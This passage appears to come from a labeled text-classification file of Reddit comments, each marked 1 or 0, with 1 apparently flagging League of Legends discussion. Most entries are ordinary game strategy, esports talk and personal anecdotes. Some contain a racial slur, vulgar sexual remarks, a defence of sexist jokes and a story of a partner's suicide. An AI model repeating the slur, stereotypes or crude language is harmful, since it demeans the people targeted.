it off because they had TheOddOne babysit mid where they were able to play snowbally champs and get multiple kills. TheOddOne would most of the time be behind the other jungler because he would spend time ganking mid and top while Turtle and XSpecial were able to win bot. They wanted that same playstyle when they picked up Amazing, who mains an extremely strong early game ganking jungler, but instead all they got was a teammate who picks junglers that are early game oriented and scale poorly into the late game and all he does is disregard lanes, acquire jungle money.   Everyone is aiming hate at Gleeb for the way he played this game, but Amazing was literally less relevant than Westrice this game and a lot of other games in the past. The reason TSM isn't at the very top of the standings is because for most of the split, they have been fighting a 4v5.
1	This. His AP scalings are pretty good, you can even rush DFG. Second item (or first in certain matchups) should be Zhonya's Hourglas, which results in a Diana-like assassin playstyle. DFG-> R-AA-W-AA-EQ - Zhonyas - R out. Also you do not need a mana item, passive w gives enough for farming and trading (esp. post 6, as you can hit your W on the enemy champion) . You can use multiple R's in extended teamfights up to like 600 mana (4 times) without going out of mana when AA 1 or 2 times. Final build is something like Zhonya's + DFG + Void Staff + Lich Bane + Rabadon's + Sorc Boots.
1	Now... On the thread title, reksai support, he has sustain(uses fury to heal while burrowed), he has his tremor sense when burrowed for those walking around in bushes, also detects invisible champs (kha, rengar, eve, shaco) when they come to gank. He has true damage which can be beefed up by storing fury. Doesn't really need damage items, he has a knock up, he has chase/initiation potential... He also has long ranged poke (burrowed q)   I can see him being a tank support tbh he has nice kit, no mana worries, take relic shield (naturally) and treat him like Leona
1	Can I still answer even if I didnt play beta/season 1? I started in season 2 and by far season 2 to preseason 3 was the best! I loved when draven had his old passive with the bleeding dear god the quadra kills and penta's I was earning in normals!! I loved it.
1	Yeahhhh. I started ranked way too early, before I had any idea what I was doing. I was good at a few specific things, but my overall game and mechanics were absolutely terrible. Once I realized this, I thought "Hmm, well, ranked is a lot more competitive so I will learn to play better here than in normals". Which was true. I consistently outplay most silvers at this juncture (queue up with silver friends to do this).   I also thought "Once I am better, I'll move on up! Because I'm very much better." But here's the thing. I played way, way too many games before that point. After so many games without significant momentum, the matchmaker assumes you belong where you are, and practically inhibits your rise. I will consistently, now, be placed on teams with significantly lower mmr, division (sometimes league), and kda (losing from 2 minutes in, all lanes, in most cases) or placed on an extremely dominant team that has higher mmr, division/league, and kda that is winning from 2 minutes in. Unsurprisingly, it sticks with one or the other for 3 or 4 games straight, then switches to the other side.
0	I was in Boy Scouts on a cold fucking camp out once when i was maybe 12. It was about seven degrees out and I had to take a piss at some unknown time in the middle of the night. It was so cold I didn't even walk to a porta John, I just unzipped the tent and did my business. While I'm doing the business a fucking human silhouette  is to my right. Normally in woods I would just jump and realize it was a tree. The problem was we where in an open feild. I jumped back on fuckin fear and left the tent open and hide under my sleeping bag that I couldn't get into because it was a mummy bag and they are hard to get into. I lied frozen all night with the tent flap half open and scared shitless for a very long time.
1	Just for the record. Last hitting is one of the most important mechanics in the game. With last hitting, you are able to get the gold from a single minion and still have the minions fighting each other. By doing this you do not push your minions too far towards your enemies' tower/turret (or whatever you like to refer it to). The benefit of this is that you will be closer to your own turret and avoid many ganks. Also, if your enemy does not know how to last hit and decides to auto attack your minions, they automatically push towards your tower, enabling your team to gank your lane.   Even if you do not get kills during lane phase of the game (most likely the first 7-10 minutes of the game), by last hitting successfully, you are able to maintain a good creep score(minion kills) and get a lot of gold. You will find that purchasing any equipment that you think is compatible with your champion a lot easier this way.   Usually,the more creep score(cs for short) you have, the greater advantage you have over players with less. Of course, this is disregarding kills, deaths, and assists, and only regarding last hitting for gold in order to purchase items quicker in the game.   [
0	OP this has nothing to do with you but for those dudes out there trying to get with other dudes girlfriends.. i need to vent because this has occured to me throughout my dating.   Dear dbag,   fu*k you she has a boyfriend stop trying to get with her and move to another chick... dudes like you suck.. you suck and dont get the picture that the girl is clearly not interested and has friendzoned the crap out of you.. youre selfish because you only think about your happiness. you keep on talking to her telling her you love her and she has a boyfriend, you obviously dont "love" her because you dont respect her decision to go out with another dude and not you.. give her space.. shes taken.. shes not the dudes property in any way shape or form but show a little respect for yourself and the boyfriend of hers.   man there are 4 billion other girls out there im SURE one of them is for you, just not that girl.. move on.
1	I don't know if anyone has mentioned it already but the link at the end of the video to the
0	I think you'd be a fool to argue that physical attractiveness doesn't make sex better. I'd agree that intimacy plays a larger role (although that can vary) but that's no reason to dismiss other factors entirely. I say this as somebody who just dated a woman with a practically flawless body, although the sex was average at best. It would have been worse without her being beautiful, though. And actually, the intimacy was pretty good too--it was factors beyond attractiveness  and  intimacy that caused problems.
0	What you said as to my first point is fair, the bible doesn't say that he is perfect. And while I disagree that there are any people who can be considered righteous that would do what he did, that's far more subject to individual opinion, so it isn't really something that I can use as a discussion point. And I apologize for using quotations around righteous, I suppose italics would have been more proper. I'm used to typing in places where italics are unavailable. However, in the previous chapter, it states that if there were 10 righteous men in Sodom that god wouldn't destroy the city. Lot was the one righteous man who was saved when the angels went looking.   About my second point, I could have sworn I read that exact wordage. I didn't mean to misquote. However, god caused famine in the land for 3 years, and when these children were killed the famine was lifted. It caused god to become once again happy with the people of Israel. As opposed to the first example, I think this situation makes it fairly clear that in god's eyes it was right.   As to my
1	Just a quick message to newbies who get a match and dont message before even ending the pairing - have a quick chat with us first to find out if we can offer you anything.   Yes I'm a Gold 5 support main but that doesnt mean I can't play other roles or know something to do with strategy, give us lower ranks a chance.
0	This. Also, you need to be in complete agreement on the Big Five:   (1) Money  -- the biggest destroyer of marriages.  source . And you need to work all this stuff out  before  you get married, preferably even before you're engaged. Make a budget. Agree to stick to it. Decide well before the marriage how the bank accounts will be set up (joint? separate? joint with separate?), who will pay what bills, who will be responsible for what expenditures. You also need to establish an unbreakable, uncompromising set of rules for how the money will be spent and how the family will decide on big purchases. If the rules are broken, even the tiniest bit (which will happen with her during the planning for the wedding and him whenever a new XBox comes out), it's time for a serious conversation.   (2) Kids  -- it seems like everyone has them, but some people don't want them. Me? I'm on the fence. On one hand I think I'd be a great dad and I'd love to raise children in a safe, loving environment where they could reach their full potential. On the other hand, I'm scared I'll screw it up and I'm still too selfish to want to sink my entire paycheck into another human being's survival. The bottom line is: I don't want children right now, and I don't know if I'd ever want children in the future. Unlike most men I know,  I tell every girl I'm dating this information.  Some completely agree, some stay with me for a while, some stay with me for less than that, and some end it on the spot.  You need to have complete agreement on (a) whether the both of you want children, and (b) how many  before  you get married.  A disagreement here could sink your marriage. Either she resents you because you don't want kids and you made her force the decision on you, or you resent her because you don't want kids and she forced it on you. Either way, the kids suffer. One parent ends up picking up all the slack and the other secretly downs scotch at the bar across the street from work because the idea of going home to screaming children makes him want to put a gun in his mouth.   (3) Sex  -- you need to be physically attracted to the person you are with. Don't settle. And the two of you need to have sexual chemistry. You don't have to be the best he's ever had, but the two of you have to be congruent. If you're into the normal, typical, three-positions-and-we're-done routine, it's probably not going to be a good idea to get married to someone who likes orgies, extreme BDSM, or is a scat fetishist. You'll be depriving them of something they physically need, and if you can't provide them with it, they'll look outside of the marriage to obtain it. I don't care how religious or how moral the both of you are. Sex is the primal drive of our species; it drives everything. For the men--cuddle after sex (some women find that as important/if not more important than the act itself), use that time to pillow talk and become more emotionally intimate with your wife/gf, and back off on asking for sex all the time. For the women--initiate sex every once in a while (makes a man feel wanted and desired), NEVER use sex as a weapon to get what you want, and always make your man feel like he's the only lover you could ever want. For the both of you-- communicate.  Tell your partner what you like and what you don't like, and don't be shy about it. The bedroom is a special place for a marriage, so let yourself go.   (4) Religion --preferably, the two of you share the same religious beliefs (or lack thereof). If you're an atheist and she's a born-again Christian, that marriage will end in disaster. If you're agnostic (but raised in a traditional Judeo-Christian family) and she's a Buddhist, you need to evaluate whether you're okay with the fact that: (a) your children will be raised according to Buddhist ideology, (b) you will not have a Christmas tree in your home, (c) you will have to explain to your children why Santa Claus doesn't come visit them but he visits all the other kids, etc. I can come up with other examples for agnostics dating people of any faith (Hinduism, Judaism, Muslim, etc.). NOTE: I also used the fact that she will raise the children in her faith because  that's what's going to happen.  The faith of the children is decided by the mother 99% of the time, and, the other 1% of the time, the mother's mother decides it. You, as a man, will have no choice in the matter.   (5) Family  -- you don't have to love his in-laws as much as you love your own parents (assuming that you do), but you do have to look out for certain issues that may pop up, based upon family history and genetics. For example, I have a strong genetic predisposition to diabetes and almost every cancer imaginable. My GF needs to know that  before I put a ring on it  because there is a chance that I may die young. Alcoholism is genetic, as is Alzheimer's. I'm not saying you shouldn't marry someone because there is a chance, down the road, that they might develop dementia. But what I am saying is, you need to look at that and think to yourself,  if this person is completely incapacitated and I have to be the only person who takes care of them, would I be willing to do it?  If your answer is a resounding yes, then you know you've found someone special. If your answer is no or meh, then you should move on. Also, remember the age old adage: women marry their fathers and men marry their mothers. If he's got a mom who caters to his every whim, what kind of wife do you think he is looking for? If she's got a dad who spoils her rotten and gives her everything she wants without her having to ask twice, what kind of husband do you think she is waiting for?
1	This may sound weird, but I played with a guy that had a similar name a few days back, and he got extremely angry at another player on our team who was not doing well. I myself got mad initially, because the person was playing Nocturne and was constantly leaving his own lane unattended to wait in bushes next to other lanes to attempt to gank, but this guy, playing Vlad, just went off on Noct the rest of the game, literally spamming both allied and all chat after each time Noct or any player on our team died, and kept saying that he was playing the game only to win, and that not winning was pointless in a game meant to be competitive.
0	I've held onto this theory that the Church of Scientology is just a front for celebrities to "launder" their money, to get out of paying taxes. To clarify, what better way to avoid taxes then by "donating" millions of dollars to your church. How do we know that the church isn't funneling the money back to all of its rich members, even for a small fee? It's public knowledge that its members have to pay for every level of "enlightenment", so the money given to the church isn't really questioned. Also, take into account that the majority of its congregation are actors. Who better to portray the crazy antics and obsession?
1	Oh I'm sorry, the mods can't just add the original theme in addition to the 2 new one.  LOOK I FIXED IT.  We're so spoiled we can't just add one little thing until we have a better grasp on making a readable theme.  Got it.
1	Jinx has the 3rd highest win-rate in the game, this  change  just makes her early game weaker because she's oppressive in lane and scales well because she has AOE crits.   Graves was a stupidly strong laner who was a better version of Lucian and had a 30~% playrate when he got nerfed.   The nerfs aren't for no reason, if you were to look at the statistics Graves's winrate is now hovering around 50%.  The point of the nerfs was to increase diversity in the marksman role.  The top 3 most popular  ADC's (Jinx, Vayne, Ashe) are seen in  79.13% of of games.
0	Nothing wrong with having one every now and then. :D Self control is key. I found my weight loss is going better than ever because I'm not running away from food, just being smart about portions and when I eat things.
0	Can confirm, I've told people not to donate to Locks of Love and instead give hair to Beautiful Lengths, and I'm pretty sure that they saw me as a douchebag... Probably because they felt so great about donating their hair, and now they got a big slap in the face by reality.   And since most people aren't aware of LoL's sketchiness to begin with, here's the
1	I am hijacking this top comment to remind people about our policies on witch hunting.   Do not use reddit as a means to rally against certain individuals or groups of individuals.  Abusive statements toward anyone are removed in this subreddit.   Please help enforce this policy by reporting any comments that accuse anyone of engaging in the behavior that the OP has described.  The OP did the right thing by omitting the specific streamer.  His post is within our rules.  Many comments have not been.
1	Meh, I read the whole thing. I find most
1	I wasn't actually claiming silence is against the code. , but that's not even an argument I intend to start, because we both know that you aren't required to type in chat.
1	You know what sucks is that the majority of times I play with redditors I feel so pressured to play perfectly. I know that's my own problem, but I remember 2 particular games where in the first game, one of the redditors said in mumble "Guys, how does it feel to have a girl have a better k/d ratio than us" (I'm a girl) and at first I thought it was just a joke but he said something similar later on and I think he really meant it.   I'm usually not sensitive about the whole "haha gamer girls lololol" but I don't want to have to worry about that when I'm just trying to play with fellow redditors.   In the 2nd game, I was having a lot of trouble getting turretdove like crazy up top and although I kept asking if I could get some help, they just said "you better step your game up", or "I blame this loss on you".   Sorry, had to let that out.   Feels bad man.
1	CLG used to be an amazing team, they still are. The problem, I feel, is that there are a lot of other amazing teams around them; so now we don't see CLG decimating the competition like they used to. If you were to put CLG against a 2nd tier team in any region, CLG would probably win decisively.
0	true story:   I was buying some beer at the local liquor store for the evening. I payed for my stuff and went outside to throw it in the back of my car. A guy was sitting in his SUV drinking something beside me(didn't pay attention)   THEN he gets out of the SUV....20 mini bottles of jack fall out...The man cannot walk a straight line at all.   He spills more bottles as he tries to handle them all into the trashcan outside the store RIGHT IN FRONT OF THE WINDOW   Stumbles back in his SUV, starts and drives off onto the Interstate...   MFW
0	Or like us, the more likely you won't actually be able to have a child. If you are a woman and you want to delay kids until you're over 35 you should look into having your eggs frozen.   My wife and I delayed things and enjoyed travelling when we were in our 20s and early 30s. Had our first child at 38. Mild autism. Couldn't have a second child on our own so we adopted.   People may say we were selfish or stupid or whatever. We frankly just didn't know. We assumed we'd have plenty of time for kids and of course they'd be healthy.  How many women (or guys for that matter) understand what the true age range for a woman's egg production is? Who's seen the chart for the incidence of birth defects/autism due to parental age?   I'm not whining about my own life. Kid #1 has mensa-level IQ is really into science and math and is interesting and fun. He does have his issues. Kid #2 is great too. He's a rough-and-tumble little bruiser who will be into sports.   But drawbacks from waiting?     Kid #2 won't get as much time with grandparents that I'd like to give him.   Grandparents didn't get much time with grandkids   Grandparents are too old to babysit.    Wife is annoyed when people assume she's grandma   I may not live to see grandkids myself   Hard to keep up with the youngsters.     So the
0	Relevantish story time. I was trying to parallel park without power steering (it's since be fixed, thank God) in the pouring rain. I thought I tapped the car in front of me, so I checked, saw no damage, and decided to find another spot. A month later, there's a warrant out for my dad's arrest for hit and run because he owns the car. Turns out a passerby wrote down my info telling the owner of the undamaged car to contact police about it.  After giving cops my information, providing photos of my also undamaged car (no scrapes to indicate any damage had happened), and going to court, I ended up paying $135 in court fees.  They never filed a claim against me, so I'm not sure what the point was.
0	As someone in food service, I agree 110%. As much as it is our job to provide good service, there is a point where there needs to be mutual respect going on. We provide good service because you respect us, and you respect us because we provide good service. Tips are NOT an obligation. Tips are a reward. A reward that I believe most servers deserve. I usually don't tip much during slow hours because I know for a fact that the workload during that time of day is low. I tip around 15% then. But during weekend night hours when the restaurants are packed, you can be damn sure I don't go a cent below 20% even if the service was regulation. 95% of the servers where I work deserve the tips they make because they genuinely try to give the best service. And while I can't deny that there are some people who abuse the "tips are obligated" stigma, the majority are hard working individuals that make more money based on the service they provide.
1	How to win games:   Pick HUEHUEHUEHUE.   Go mid.   Win or lose lane, you are still the CS machine.   Along comes a team fight. HUEHUEHUE instagib their highest physical damage output. Ghost rapes team for you.   Proceed to snowball. Dat % scaling ulti that also scales with enemy AD.
1	Please stop giving into ignorant peoples' illogical feelings.   Nigger and Nigga are NOT the same thing.   No black person goes around saying "what's up my nigger," so just stop.  The same thing can be said back to ignorant white people.  When imitating a black person, saying "What's up my nigger," just makes you sound racist.   And if it's the same word but black people are incapable of pronouncing ER and thus must say A, then why can blacks use it but not whites?  If both uses are in friendly context, what's different about a white saying it?  Is there some inequality between races I don't see?
1	No Team in the world plays a similar style in terms of adc as gambit does. I'm not saying it's the best style, but ganja definitely gets the least protection of any adc in the world. He has to build a pot of ad and little as because there is no time to continually attack someone, he always has to reposition.
1	As a support main, season 4 seems exciting to me, but there are some things that  I worry about too.   I spent a good amount of time learning how to appropriately cover the map for certain objectives in a "macro" sort of play. Warding is how you keep busy while your laners push out the side lanes.   Now, it seems unclear to me what  exactly makes a good support player in season 4?  The role of warding has obviously been split up amongst your teammates and oracles is gone. The gold difference between you and other champions is less you it becomes more ok to accidentally walk too close to their mid laner. Most of the gp10's now tether you to your allies, you can't roam as much since the other support who just sits next to the adc in lane will outfarm you.   We know that support is probably the most counterintuitive role in the game at the moment, but I hope Riot hasn't just made us nothing more than mages and tanks that fight bottom lane.   Granted, maybe Riot has fixed everything perfectly and there's nothing to worry about. But shaking up the two main pillars of the support role (warding and not getting gold) might not wok out on the first try... hopefully the transition isn't too rough.
1	I looked up to the character you have been playing, and if i can give you some advice, 1st don't play Vayne, she is hard to master whatever people would say, you have only 175 wins in normal, so I assume around 400 games with your ranked, wich is really too low, you shoulda have pratice and learn 2 or 3 roles in normal game, i'm actually at 1500 normal game with 20ranked, and i can say that i'm a decent Top/Jungler/Mid, you should try to do more normal and improve yourself on your favorites roles.   Than, i saw you play a lot of CC Champs, such as Alistar and Nautilus, they are definetely good in mid/high elo, but you are playing with 500elo Teammates, so your CC won't be usefull as they are going to be wasted   If i was in the same state as you, i'ld play either Midlane (Annie/Morgana/Kassadin) to help a lot your other lane while still being fed, or jungler, just beacuse you can gank everywhere, i'm assuming wards is not a common word in the 500elo games...   From now, you know the word "WARD" and you'll use them, at least for your own protection (I guess you can't use them agressively with the ack of team organisation).
0	Backstory:   The relationship was great at first. Then it went downhill. It started when a friends father passed away (female friend). She was very close to her father and it hit her like a ton of bricks. We were studying at the same university. We had been friends we were kids but she only had a few friends there. Since her family lived far away she turned to me for consolation. I did all I could to make her feel better. Sometime she'd call me in the middle of the night because she was crying and needed someone to talk to.   I spent a lot of time with my friend and this made my girlfriend jealous. She suspected that I was cheating on her. I was pissed at first when she mentioned it but I forgot it pretty quickly. She didn't stop though. She kept making comments which eventually made me lose it. We had arguments almost every day before we broke up the first time. I told her I'd had enough and suggested that we'd spend some time away from each other.   Time went on and we didn't meet for about 4 months*. Then she contacted me. She wanted to get back together. She told me she was sorry for being a bitch. I believed her. We met again and It felt like normal again. The after a few weeks I started noticing something was wrong. She was starting to become extremely clingy and paranoid. Sometimes she'd call and text me whenever we hadn't met for a few hours. I didn't confront her bout it until I caught her reading my texts. We started having arguments again and it felt just like before we broke up.   I told her I'd had enough and that I was leaving her. She told me she'd kill herself if I did it. Angry as I was I just ignored her because I didn't believe she'd do it. She killed herself after 3 weeks. I left out a lot of details but now you know basically what happened.
1	I think what he means by a support jungler is not that he plays support junglers like Nunu, Alistar, Maokai, Nautilus, etc. It's that he supports his team in his game play. TOO used to listen to the calls of Reginald to control where he goes and what he does, usually letting TRM be independent top and letting Chaoxpecial take care of bot while ganking mid a lot to control mid game. More recently (after dyrus swap), he has been taking more charge and ganking top and bottom a lot more. Although, TOO still suffers from playing the support jungler role in his plays still. Unlike junglers like SV who are carry junglers who naturally take the lead and make plays based on their own understanding of the map and not what his teammates want him to do.
1	its funny cause half the greif is that the game takes too dam long, you know when your going to lose, and then it take 20+ minutes for the loss to actually happen. In that time, everyone is bitching, whining and complaining cause they can't leave, they will get banned. They are force to play this terrible situation for the next 10-15 minutes. And you always have some people who will refuse to surrender, no matter how obvious it is your going to lose.
1	No. Just. No.   Fanboy-ism, as you call it, makes everything worse. You should watch streams because YOU enjoy the streamer for whatever reason. Maybe you want to improve your game on a specific role, a streamer specializing in that would obviously rank higher than another.   Maybe you enjoy watching people rage (cause it's funny to some people), go ahead and watch rageshotgg, but personally, I'd rather avoid that bullshit and not see the plague that ruins this community. Raging at teammates destroys this game, and I'd much rather watch someone who doesn't call his teammates retards, no matter how bad they are.   The number of viewers on a stream is simply popularity, and that comes from many things. Hotshot got his viewers (most likely, I honestly have no clue how/why people can watch him) from his plays at a tournament with Nidalee. And following that, just because a stream is popular, doesn't mean it's good, nor does it mean that it's what you personally would like to watch.
1	Thanks, it'll be very useful for anyone, who's seeking for
0	This was my life recently.   She just needed two days to think but she knew she wanted to be with me.  That time kept growing and growing, all the while she had no problems going out with friends she only had a problem seeing me.  Then every time I got angry about it and wanted some sort of a concrete answer she would get angry and say I was throwing away our relationship.  Then I saw her at the concert we were supposed to go together to with another guy.
1	I'm sorry, but you're making huge speculation out of something very vague that was even said in another language.   And who honestly thinks EDG has a chance of 1st against SGW? Group A is already set in first and second unless we see SGW be massively worse than they have been all year. There's no possibility of "strategic" match-fixing accomplishing anything, in my eyes.
1	The important thing to remember when you roam is that the point of roaming is not necessarily to get kills, but to create map pressure. Exerting map pressure well as a mid laner happens to generate kills, as it puts  all  lanes in a position they do not want to be in (ie: unaware of your position).   For example, roaming does not always mean moving to top or bot lane. If you are able to push the enemy midlaner to turret and leave the lane, you create options for yourself. If you can trick a mid laner into walking into brush where you are waiting with a full damage combo, you put some apprehension in him following you to roam. If you decide to roam bot lane, you create a kill opportunity. Roam into his wraiths if you spot the enemy jungler bot or top lane as you push.
1	they are probably out. kta won 2-0 vs prime and skt k and lost 2-0 to skt s.   skt s and skt split so skt s has more points than skt k IF they will win vs prime.   But since prime is a new team everyone expects them to get 2-0d. and they got stomped by skt k and kta.   sorry for my horrible english but i hope it was udnerstandable.
0	No. Well, when I first got it I was a douche. But I loved how it felt because I've only ever had stock speakers. I really only listen to alternative rock and metalcore. I am not a fan of dubstep, techno, or bassy rap (what most douche's love to blast). Occasionally something will catch my ear that sounds good.   But what I do love, is good, quality sounding music. And with my sound system, I get kick ass sound quality. Everything is clear and balanced. I have spent many night twisting my subsonic, crossover, subwoofer, tweet settings on my amps. I love music more than I love anything else.   I want great sounding music and nothing is more fucking stupid than a car that blasts music and when you get inside the only thing you can hear is the bass, no highs or mids, vocals or anything. Just bass. Fuck those guys. Because of douche bags like them, I get self-righteous, I'm better than you, dick heads, like you, on my ass when I say I have a sound system in my car.   So, yes, I do have a sound system that turns girls on and stops old people's hearts, but I drive alone 99% of the time, and I have it tweaked to sound GOOD and I don't need to hear just bass.   When it comes to hearing people honk, when I had my stock speakers, I would listen to music loud. That has never changed. When I am alone, I'm fuckin' jammin' out man! I am that guy you see dancing and singing in his car.   But no, I am not an attention whoring douche bag that likes to make heads turn.
0	This might come as a surprise to you, but how people act on the interwebs and how they actually are, are two different things most of the time. Someone who makes racist and/or sexist jokes on the internet, is not necessarily a racist and/or sexist. You know, stereotypes make for good jokes and guess what, most of the successful comedy shows etc. are based on them.   Plus stuff like "too fat, wouldn't f'%#", "something something sandwich" or "back to the kitchen her derr" are more like a meme than actual opinions.
0	In High School I used to conceal vodka in water bottles, because it looked less conspicuous to carry around. So the morning after a party I had woke up and saw a water bottle and because I was hungover and thirsty I took a large gulp of the vodka water bottle.
0	My parents are divorced. Mom lives in Louisiana near New Orleans, dad in Wisconsin near me. My sister lives in Colorado and just had a baby.   I went to visit my mom and brought a friend for mardi gras. The deal was my mom would drive us anywhere and pick us up. We'd stay at her place so free room. We could do whatever we wanted.   She basically made us hate our trip. She woke us up one day and said we should start painting her house. She guilted us when we said we'd rather not. We spent 2 days painting. Then it was moving furniture time. My friend tried to get an earlier flight home but they were all booked.   I visited my dad for Christmas this year. I left early because he kept bad mouthing my mom. I don't need to know how much child support you paid her. He keeps bringing up that I'm in debt because she never paid for my college. I said he didn't pay for it either and he said, "I gave your mother x amount of money and that was for you kids." I don't know what she spent your money on. I was a kid. Not my business.   Now my sister and niece. My niece will be a year old before I meet her. It may even be longer than that. My dad is offering to take me with him in May to visit my sister and niece. I told him I work part time and can't really afford that. He said he'd pay for the hotel and drive. But my bills won't get paid while I'm gone. I called my sister and talked to her about it.   She started a guilt trip on me, too. Yes, I want to visit my niece. I haven't seen my niece ever and I haven't seen my sister in almost 4 years. I told her I would go if I could find like $600 because my dad wants to be gone basically my entire pay period. 10 days. Because I'm part time, I get 4 days vacation per year and I used one as a sick day.   She still guilt trips me. Sends me pictures of my niece with captions about "I can't wait to see you in May" and shit. I don't even know if I can get the time off yet.   I'd rather go on vacation myself.
0	I'm sure this will be buried seeing as I'm late to the party, buuuut: Welcome to the club, buddy.  Mid thirties, divorced, had sex once since my divorce, and the last half of my marriage was dry, too.  That one time was when I actually hired a professional escort (i.e. not a cheap street hooker) and paid for sex.  It was...actually a very enjoyable experience.  The sex was great, conversation was even good, she managed to make it totally not feel awkward at all.  I have enough disposable income that I could actually afford to do this on a semi-regular basis, but what has kept me from ever doing it again is that I'm a pretty straight arrow, and prostitution is of course illegal.  This makes the whole process of hiring an escort somewhat complicated and very risky, and other than being a complete failure with the opposite sex and relationships, I actually have a pretty good life, so I have a lot to lose if I were to get busted.
0	I used to work with a transgender person, I couldn't say much that doesn't offend her (at least from experience, before everyone berates me for generalizing).   Had to call an ambulance for her once because she fainted and was breathing oddly and the man on the phone asked for information about her.   I didn't know until after paramedics arrived that physically she was female because she never shared that kind of information, and whenever anyone asked she would get irritated because she was supposed to be "in the mentality of a man" and used the men's room and so on, so no one at work knew for sure.
0	Yeah, I've been going to the same hair person for two years now? I actually look forward to it and we talk in between.  She's actually set me up on a lot of dates with her friends (all pretty attractive) and talked me up enough to them where I have little to do (they take ME home). I guess I am lucky, but seriously, best person for advice and just venting to (cheaper than a shrink).
0	I just purchased my first house and inittially was uppity about using high ply toilet paper. After clogging up my toilet and almost having to call the plumber, I quickly lowered the grade of toilet paper and use less.
0	God yes.  There was a thread in another subreddit a couple years ago, where women were saying not to wash their labia.  I explained to them how that's bad hygiene, and you can get infections and such that way.  You would have thought I told them they should all get their clits torn out with pliers.  One girl called me 'insensitive', then got mad when I told her she was the 'insensitive' one by forcing everyone around her to smell her funky pussy.  (She admitted to having funky pussy smell everyday).  I've taken classes on human health and hygiene.  I have consulted with many OB/GYN's because I've worked with teen girls in group homes, who had STD's, infections, and other problems.  I have never heard from a legitimate health professional that you should only wash your labia with water.  I have always heard that you should wash with a gentle soap, and warm water.  And you need to wash all the folds, to remove the bacteria.   But no, these girls had to quote some Cosmo article or something, claiming washing labia with soap is dangerous.  I hope they enjoy their infections, and lack of sex.
0	I believe that morality is objective, yes. I don't care what culture dictates, there's right and there's wrong. To paraphrase, "if two thousand people believe that something wrong is right, it doesn't make it right." So yes, the wrongness of stabbing people is an unassailable truthfact. If you want to get into the quantum mechanics of  justification , it's anyone's guess: however, there is one right answer, regardless of our own personal verdicts.
0	Nasacort and Flonase are two over the counter intranasal corticosteroid sprays for allergies.  Allergic responses are mediated by a host of chemical signals, chiefly histamine, but there are MANY others.   Corticosteroids prevent the release of lots (but probably not all) inflammatory / allergy mediators.  They have nasty side effects when used chronically systemically (oral prednisone for more than a few weeks), so they've been formulated into a dosage form that has reduces systemic absorption (which is good because many people use them for weeks at a time because allergy is a chronic disease) while still being very active at the site of action (in and near the sinuses).   After the first dose you should notice some immediate symptom improvement in 1-2 hours, but the full effect can take a week or so to get up and going (since we're preventing the release of things that are causing you problems, and some of those 'things' are already present at time zero).   I like to recommend nasal corticosteroid sprays as a second line (after antihistamines) in allergy sufferers, not because they are less effective (they are arguably more effective), but because they are more expensive and less convenient than a 24 hour cetirizine, for example.
1	Nonono do not be sorry! The fact is that you did something a big part of the comunity liked. He is the one we should be sorry about since he can't keep pace with how society works otherwise he wouldnt come here to say you didn't put effort into something. You did and some of us liked and that's what you should care about. He didn't even give you any structured feedback... It is pure bashing and so you shouldn't apologize!   Keep those
1	IIRC, Blaze hasn't played a competitive match since the Champions Spring finals against MVP Ozone, which was less than a month ago. Before that, they were on a 13-game win streak, and were the clear favorites to take the entire tournament. They arguably didn't underperform against Ozone, but instead were completely unprepared for the strategic brilliance that Ozone brought to the table. To be honest, nobody had expected Ozone to win against Blaze (or SKT2, or KTRB for that matter), and Blaze's split push/slow push strategy had been undefeated for WEEKS.
1	Alliance and Roccat look average   Roccat looked incredibly strong in the play-offs. Alliance went 1-2 to the Spring Split winners. How's that looking average?   Let's compare that to NA LCS:   Dignitas picked up 2 new players which is  a lot  to change at once in a team. Also their biggest problems lie on shotcalling, team gameplay and strategy (even Monte tweeted this)   EG is considering new roster swaps, since they performed so horribly in the spring split. Their understanding of the game and individual performance has still shown no signs of improvement.   Complexity black doesn't look strong at all, not only invidually (i.e Westrice underperforming) but also collectively.   Curse remains in the middle of the pack, better than the bottom tier but also not near the top tier.   TSM has been a slump for a long time, they have shown signs of internal problems (Xpecial being benched). It seems they're also considering getting a new jungler. Swapping one or even both of their veteran players is definitely going to hurt them.   CLG is still looking for a toplaner. Honestly it can go either way.   Only C9 and LMQ look consistent at this point
1	Your mindset: I got 4 idiots in my team playing vs 5 insanely good players.   What you tell your teammates when they do a mistake: My bad. Sorry. // Doesnt matter, we can still win // Damn, where did he came from.   What you tell ur mates if they were near a good play: Grat job  champname  // Thanks alot!
0	This isn't something that's okay to say  ever .   Speaking as someone with depression who has struggled with self-harm and suicidal tendencies and lost some people to suicide, this is about one of the worst situations I can imagine.   Not only did those students just lose someone who they had known and gone to school with for some time but then a teacher decides to impose her religious views on the matter? Scratch that. It doesn't even matter that it's a religious view. I'm religious and I'd never say shit like that.   You know why? Because things that can spark depression include [feeling like a social outcast, prejudice, and stress]( and if you're a close friend of someone who has committed suicide because of depression or something else, odds are that you struggle with similar issues.   People with depression, like me, tend to group together because few other people understand the mindset that leads you to thinking in this way. My two best friends both also suffer from depression, panic attacks, and self-harming tendencies.   This aside, being in a situation like this is bound to induce situational stress because most people would intrinsically disagree with the teacher's assessment but they are in a position of authority. [Stress is one the largest factors into psychological breakdowns]( and what that teacher just said will not be helping anyone.   Not only did this teacher slander someone who had just died, they also hurt other people who knew that person through their words and actions. That's not what a teacher is for.
0	But then how else would the spouse get paid to stay at home?   Source - I'm from a small town where you either went to college or the military. Most of my buddies took the latter of the two options, joined right out of high school. The worst stories I ever heard from them were about the crazy spouses of one person or another. I always asked why they were married/with them in the first place. And the story would generally go something like, "got pregnant, then decided to get married for the extra pay. Now I can't get rid of him/her (the spouse, not the child).
1	That may be. I've put in almost 150 ranked games already.   In regards to playing more, my girlfriend typically works for only 4 hours so I may play two more hours on the weekend than I do on the weekdays.   My main character (Ahri) I have the following average according to my ranked stats:   Wins: 17 | Losses: 19 | Win percentage: 47.2% | Average Kills per game: 5.6 | Average Deaths per game: 3.1 | Average Assists per game: 7.9 | Average CS per game : 143.1   My second character (Rumble) I have the following according to lolking: Wins: 24 | Losses: 16 | Win percentage: 60% | Average Kills per game: 5.6 | Average Deaths per game: 3.8 | Average Assists per game: 7.1 | Average CS per game : 144.9
